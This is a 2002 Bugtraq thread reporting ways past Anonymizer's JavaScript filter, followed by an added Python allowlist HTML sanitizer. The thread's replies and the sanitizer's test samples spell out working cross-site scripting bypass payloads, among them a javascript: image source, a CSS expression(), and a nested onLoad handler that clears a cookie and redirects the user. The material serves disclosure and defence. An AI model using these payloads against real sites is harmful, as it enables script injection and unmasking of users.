[24941] in bugtraq
Re: Bypassing javascript filters - problem N3.
daemon@ATHENA.MIT.EDU (fozzy@dmpfrance.com)
Wed Apr 3 20:03:50 2002
In-Reply-To: <3327287312.20020401233749@leader.ru>
From: fozzy@dmpfrance.com
To: "Alexander K. Yezhov" <admin@leader.ru>
Cc: bugtraq@securityfocus.com, support@anonymizer.com, feedback@anonymizer.com
Date: Tue, 02 Apr 2002 15:48:23 GMT
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Message-Id: <20020402154823.D668ADB77@mail.fr.clara.net>
Hello,
I took a quick look at it. This service seems to be vulnerable to several
known attacks against webmail services.
I successfully injected unfiltered javascript into a web page browsed
through Anonymizer using:
* <img aaa="bbb>" src="javascript:alert('beep');">
(the original idea was published by Marc Slemko on vuln-dev, 23 Feb 2000...
but it is still ignored on many webmail services!)
* <P STYLE="left:expression(eval('alert(\'boop\')'))"> (thx to Guninski -
Bugtraq 1999)
* Some things that seem to work only with Netscape 4.x, like:
<STYLE TYPE="text/javascript">alert('biip');</style>
<STYLE TYPE="application/x-javascript">alert('burp');</style>
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="http://.../script.js">
(thx to Jeremiah Grossman - WhiteHatSec Aug 2001)
...and probably more!...
I wish good luck to Anonymizer, because what they are trying to do is
very close to "malicious HTML filtering" in webmail services, and it seems to be
really difficult for webmail sites to set up good filters. I hope Anonymizer
will show the way to good web privacy.
FozZy
Hackademy - Paris.
Hackerz Voice International Edition
http://www.dmpfrance.com
Alexander K. Yezhov wrote:
> Hello bugtraq,
>
> Title: Bypassing JavaScript filters
> Service: Anonymizer, maybe similar services
>
> Description:
>
> Anonymizer offers free and commercial services that allow users to browse
> the web safely. Since JavaScript can be dangerous, all script blocks and
> events are cut from the HTML.
>
> Problem N3:
>
> Maybe you remember the problem I reported in 2001 - JavaScript
> code could be executed after parsing of the HTML by Anonymizer. The
> same principle of "JavaScript inside JavaScript" gave me a working
> example of redirecting Anonymizer users recently.
>
> Demo is available as Test N3 at
> http://anon.free.anonymizer.com/http://tools-on.net/you.shtml
>
> The part of the code before parsing:
>
> onLoad="onLoad="document.cookie='rw=; expires=Thu, 01-Jan-1970
> onLoad="location='unprotected_location';"
>
> The same code after parsing:
>
> onLoad="location='unprotected_location';"
>
> Errors generated for visitors without Anonymizer are suppressed by the
> window.onError handler.
>
> Problem status:
>
> Anonymizer has been contacted and patched already.
>
> Best regards, Alexander
>
> -----------------------------------------------------------------------
> MCP+I, MCSE on Windows NT 4, MCSE on Windows 2000
> http://leader.ru http://tools-on.net (Security & Privacy on the Net)
> -----------------------------------------------------------------------
>
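The cases in this thread (the nested `onLoad="onLoad=...` trick, an attribute value containing `>`, a `javascript:` URL, an `expression()` in `style=`, and script-typed `<style>`/`<link>`) all defeat filters that edit the raw markup with string or regex replacement, because the output is not a fixpoint of the filter. The Python below is an added example, not Anonymizer's code (their filter is not public) and not code from either poster: it parses the fragment with the standard-library `html.parser`, re-serialises only allowlisted tags and attributes, rejects URL schemes other than http(s)/mailto/relative after stripping whitespace and control characters, and exposes an idempotence check. The sample inputs are constructed from the payload shapes quoted above; `example.invalid` stands in for the elided host in the `<LINK>` case.

```python
"""Allowlist HTML sanitizer, added as an example for the filter-bypass
cases quoted in this thread. Not Anonymizer's code (their filter is not
public); Python 3 standard library only. Sample inputs are constructed."""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags that may survive and the attributes each may keep. Anything else is
# dropped: unknown tags are unwrapped (their text is kept), and on* handlers
# or style= never reach the output because no allowlist contains them.
ALLOWED_TAGS = {
    "a": {"href", "title"},
    "img": {"src", "alt", "width", "height"},
    "body": set(), "p": set(), "b": set(), "i": set(), "em": set(),
    "strong": set(), "br": set(), "ul": set(), "ol": set(), "li": set(),
}
DROP_CONTENT_TAGS = {"script", "style"}   # their text is code: drop it too
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}   # "" = relative URL


def safe_url(value):
    """Keep only relative, http(s) and mailto URLs. Whitespace and control
    characters are removed first so a scheme cannot hide behind them;
    urlsplit() lowercases the scheme, so JaVaScRiPt: is caught as well."""
    cleaned = "".join(c for c in value if c.isprintable() and not c.isspace())
    try:
        return urlsplit(cleaned).scheme in SAFE_SCHEMES
    except ValueError:            # malformed IPv6 literal etc.: reject
        return False


class AllowlistSanitizer(HTMLParser):
    """Rebuilds markup from allowlisted pieces only. Because the output is
    re-serialised from the parse rather than edited with regexes, a construct
    that only becomes an attribute after one removal has nothing to become."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropping = 0          # nesting depth inside script/style

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.dropping += 1
            return
        if self.dropping or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:      # html.parser lowercases tag/attr names
            if name not in ALLOWED_TAGS[tag]:
                continue               # drops onload=, style=, junk names
            value = value or ""
            if name in URL_ATTRS and not safe_url(value):
                continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)      # no stray </img> or </br>

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.dropping = max(0, self.dropping - 1)
        elif not self.dropping and tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(html.escape(data, quote=False))


def sanitize(fragment):
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)


def is_idempotent(fragment):
    """A filter whose output changes when filtered again has not reached a
    fixpoint, which is exactly what a nested-handler payload relies on."""
    once = sanitize(fragment)
    return sanitize(once) == once


def looks_clean(output):
    """Coarse check for the markers used by the payloads in this thread."""
    low = output.lower()
    return not any(m in low for m in ("javascript:", "expression(", "alert(", " onload"))


# Constructed inputs modelled on the cases quoted in the thread.
SAMPLES = [
    r'''<img aaa="bbb>" src="javascript:alert('beep');">''',
    r'''<P STYLE="left:expression(eval('alert(\'boop\')'))">text</P>''',
    r'''<STYLE TYPE="text/javascript">alert('biip');</style>''',
    r'''<LINK REL=STYLESHEET TYPE="text/javascript" SRC="http://example.invalid/script.js">''',
    (r'''<body onLoad="onLoad="document.cookie='rw=; expires=Thu, 01-Jan-1970 '''
     r'''onLoad="location='unprotected_location';">'''),
    r'''<a href="  JaVaScRiPt:alert(1)">x</a>''',       # scheme hidden by case/space
    r'''<a href="https://example.invalid/">ok</a><img src="/pic.png" alt="pic">''',
]

if __name__ == "__main__":
    for s in SAMPLES:
        out = sanitize(s)
        print("%-6s %r" % ("clean" if looks_clean(out) else "DIRTY", out))
```

Run it with no arguments to see each sample's sanitised form. The idempotence check is the regression test worth keeping in a filter's test suite: a filter whose second pass still changes something is one whose first pass can be made to produce markup it would have rejected.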